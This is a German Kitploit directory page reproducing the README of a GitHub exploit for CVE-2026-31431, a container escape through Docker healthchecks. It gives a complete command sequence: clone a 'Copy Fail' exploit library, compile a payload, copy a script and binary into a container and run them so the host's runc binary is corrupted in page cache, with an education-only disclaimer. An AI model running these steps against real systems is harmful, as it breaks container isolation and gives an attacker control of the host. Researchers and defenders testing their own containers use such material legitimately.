Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-31431-Copy-Fail-Container-Escape — # Container-Escape bei jedem Docker-Container mit aktiviertem Healthcheck über CVE-2026-31431 | Kitploit
Tools/GitHubGitHub/hans362/cve-2026-31431-copy-fail-container-escape
Container-SicherheitSchwachstellenanalyseExploitationCloud-SicherheitLernen & BildungContainer-Ausbruch
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

# Container-Escape bei jedem Docker-Container mit aktiviertem Healthcheck über CVE-2026-31431

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

CVE-2026-31431-Copy-Fail-Container-Escape

Demo

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

Voraussetzungen

  • Container anfällig für CVE-2026-31431
  • Container-Healthcheck konfiguriert und Healthcheck-CMD bekannt
  • Root-Zugriff innerhalb des Containers erlangt (falls nicht, kannst du einfach Copy Fail verwenden, um einen zu bekommen)

In diesem Repository wird docker-compose.yml bereitgestellt, um einen anfälligen Container einzurichten. Du kannst auch jeden anderen anfälligen Container verwenden oder deinen eigenen einrichten, aber denke daran, den Exploit-Code entsprechend anzupassen.

Schritte zum Exploit

root@kitploit:~
# Auf der Host-Maschine
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# Innerhalb des copyfail-Containers
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# Ein paar Minuten warten, bis der Healthcheck läuft
# und prüfen, ob /tmp/pwned auf dem Host erstellt wurde

# Auf der Host-Maschine
ls /tmp/pwned

Sobald der Exploit erfolgreich ist, wird der Pagecache der runc-Binärdatei auf der Host-Maschine beschädigt. Du kannst ihn wiederherstellen, indem du echo 3 | sudo tee /proc/sys/vm/drop_caches auf dem Host ausführst.

Credits

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

Haftungsausschluss

Dieses Repository dient nur zu Bildungszwecken. Es sollte nicht für böswillige Aktivitäten verwendet werden. Der Autor ist nicht verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Codes entstehen. Verwende es immer in einer kontrollierten und legalen Umgebung.

Tool herunterladen